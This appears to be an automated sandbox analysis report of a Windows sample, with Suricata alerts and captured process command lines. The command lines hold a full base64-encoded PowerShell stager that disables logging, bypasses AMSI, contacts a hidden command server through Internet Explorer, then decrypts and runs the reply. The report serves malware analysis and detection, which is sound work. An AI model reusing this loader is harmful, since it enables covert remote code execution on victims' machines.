Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 12, 2024, 11:19 a.m. | Aug. 12, 2024, 11:21 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=
2628
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 117.18.232.200:443 -> 192.168.56.101:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 192.168.56.101:49169 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49170 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49168 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49171 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.101:49172 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA= |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7